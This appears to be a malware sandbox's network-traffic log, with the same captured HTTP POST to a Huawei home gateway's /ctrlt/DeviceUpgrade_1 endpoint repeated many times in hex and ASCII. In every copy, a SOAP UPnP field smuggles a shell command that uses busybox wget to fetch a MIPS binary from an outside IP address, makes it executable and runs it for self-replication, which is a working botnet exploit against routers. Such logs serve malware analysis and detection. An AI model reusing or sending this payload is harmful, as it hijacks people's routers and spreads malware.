57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 